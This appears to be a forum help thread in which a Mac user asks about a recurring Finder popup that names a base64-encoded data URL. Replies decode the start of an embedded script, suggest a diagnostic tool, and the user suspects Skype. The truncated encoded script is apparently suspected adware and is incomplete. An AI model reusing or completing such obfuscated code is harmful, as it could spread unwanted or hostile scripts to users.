Weird popup in Finder

Dear all,

I randomly get a popup coming from the Finder saying:

Non Γ¨ stata impostata nessuna applicazione per aprire l'URL data:text/html;base64,PHNjcmlwdD4oZnVuY3Rpb24oKXtmdW5jdGlvbiBnKGEpe3ZhciBjLGI7Y z0iIjtmb3IoYj0wO2I8YS5sZW5ndGg7YisrKWMrPV ... aXB0Pg==.

The first part is in Italian but translated means there is no application to open the following URL

At the beginning I thought it was an adware but it doesn't seem related to Safari or any other browser since it really comes from the finder and even if I force close the browsers it stays there.

Any help?

Thank you.

The encoded 'URL' seems to be a script that starts:

[script](function(){function g(a){var c,b;c="";for(b=0;b<a.length;b++)c+

One of the flaws in macOS is that it is difficult to figure out which process triggers the error dialogs that are displayed by the system. It's unlikely, in my opinion, that his one is actually something the Finder is doing. The Finder just happens to have focus when it occurs.

So, let's start by gathering some basic information about your machine, please run EtreCheck:

http://www.etrecheck.com

and paste it's report here. (Use English language settings when doing this, please.)

Hello,

actually i started closing apps selectively and waiting for a while. In particular it seems that Skype was the source of the problem. Now I uninstalled it and I will monitor the situation, in case the problem is gone I will mark this as solved. I will also remove/update the plugins as suggested..

thank you.
